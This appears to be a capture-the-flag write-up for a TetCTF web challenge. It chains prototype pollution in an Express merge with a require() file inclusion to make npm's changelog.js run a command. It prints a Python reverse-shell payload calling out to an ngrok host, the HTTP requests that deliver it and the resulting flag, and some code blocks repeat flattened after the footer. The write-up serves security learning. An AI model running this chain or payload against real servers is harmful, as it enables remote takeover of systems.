Animals

There is a prototype pollution vulnerability in /api/tet/list when merging the request data:

app.post('/api/tet/list', function (req, res, next) {
    try {
        const getList1 = require("./static/list-2010-2016.js")
        const getList2 = require("./static/list-2017-2022.js")
        let newList = merge(getList1.all(), getList2.all())
        let data = req.body.data || "";
        newList = merge(newList, data);
        res.json(newList)
    } catch (error) {
        res.send(error)
    }
})

Furthermore, user input being passed to require() leads to a LFI vulnerability.

app.post('/api/tet/years', function (req, res, next) {
    try {
        const list = req.body.list.toString();
        const getList = require("./static/" + list)
        res.json(getList.all())
    } catch (error) {
        console.log(error);
        res.send(error)
    }
})

If we could find a valid .js file that uses an attribute that we are able to pollute to spawn a new process or execute a command, then we could escalate this to an RCE.

In the Docker container, the most likely place where we could find a suitable candidate would be in the node_modules folder, containing the source code of the installed modules.

Doing a simple search for the child_process string, we could find some interesting scripts:

$ cd /usr/local/lib/node_modules
$ grep -r "child_process" .

...

./npm/scripts/changelog.js:const execSync = require('child_process').execSync
./npm/scripts/update-dist-tags.js:const { execSync } = require('child_process')

The changelog.js script indeed has an execSync call with a possible command injection.

'use strict'
/*
Usage:

node scripts/changelog.js [comittish]

Generates changelog entries in our format as best as its able based on
commits starting at comittish, or if that's not passed, latest.

Ordinarily this is run via the gen-changelog shell script, which appends
the result to the changelog.

*/
const execSync = require('child_process').execSync
const branch = process.argv[2] || 'origin/latest'
const log = execSync(`git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...`).toString().split(/\n/)

Since the require() call would not pass in any arguments, process.argv[2] is undefined. Therefore, we can pollute process.argv[2] with a command injection payload before importing the changelog.js file.

Testing this locally:

let a = {}

const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (dest, src) => {
    for (var attr in src) {
        console.log(attr);
        if (isObject(dest[attr]) && isObject(src[attr])) {
            merge(dest[attr], src[attr]);
        } else {
            dest[attr] = src[attr];
        }
    }
    return dest
};

b = { 
    ['__proto__']: { 
        '2': "; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';"
    } 
}

merge(a, b);
require('./changelog.js');

To perform this exploit chain on web server, we first perform the prototype pollution:

POST /api/tet/list HTTP/1.1

...

Content-Type: application/json

{
    "data": {
        "__proto__": {
            "2":"; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';"
        }
    }
}

Then, we exploit the LFI vulnerability to execute the changelog.js script.

POST /api/tet/years HTTP/1.1

...

Content-Type: application/json
Content-Length: 81

{"list":"../../../../../usr/local/lib/node_modules/npm/scripts/changelog.js"}

This should grant us our reverse shell.

$ cd /
$ ./readflag
TetCTF{c0mbine_p0lLut3_lFiii_withN0d3<3}

Previous2X-Service NextEzflag Level 1

Last updated 2 years ago

app.post('/api/tet/list', function (req, res, next) { try { const getList1 = require("./static/list-2010-2016.js") const getList2 = require("./static/list-2017-2022.js") let newList = merge(getList1.all(), getList2.all()) let data = req.body.data || ""; newList = merge(newList, data); res.json(newList) } catch (error) { res.send(error) } })

app.post('/api/tet/years', function (req, res, next) { try { const list = req.body.list.toString(); const getList = require("./static/" + list) res.json(getList.all()) } catch (error) { console.log(error); res.send(error) } })

$ cd /usr/local/lib/node_modules $ grep -r "child_process" . ... ./npm/scripts/changelog.js:const execSync = require('child_process').execSync ./npm/scripts/update-dist-tags.js:const { execSync } = require('child_process')

'use strict' /* Usage: node scripts/changelog.js [comittish] Generates changelog entries in our format as best as its able based on commits starting at comittish, or if that's not passed, latest. Ordinarily this is run via the gen-changelog shell script, which appends the result to the changelog. */ const execSync = require('child_process').execSync const branch = process.argv[2] || 'origin/latest' const log = execSync(`git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...`).toString().split(/\n/)

POST /api/tet/list HTTP/1.1 ... Content-Type: application/json { "data": { "__proto__": { "2":"; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';" } } }